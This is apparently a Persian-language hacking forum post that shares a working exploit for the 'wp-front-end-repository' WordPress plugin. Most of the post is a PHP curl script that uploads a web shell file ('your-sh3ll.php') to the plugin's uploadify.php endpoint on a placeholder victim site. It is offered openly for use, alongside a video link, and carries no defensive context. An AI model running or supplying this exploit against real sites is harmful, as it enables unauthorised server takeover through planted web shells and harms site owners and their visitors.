SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

wp-front-end-repository plugin Upload shell

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • wp-front-end-repository plugin Upload shell

    [align=right] [/align]wp-front-end-repository Wordpress plugin Upload shell

    With This exploit 

    کد:
      <?php
    $uploadfile="your-sh3ll.php";
    $ch = curl_init("http://victim.com/content/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php");
    curl_setopt($ch, CURLOPT_POST, true); 
    curl_setopt($ch, CURLOPT_POSTFIELDS,
            array('Filedata'=>"@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>  
    Download Video
    [align=center][/align]
صبر کنید ..
X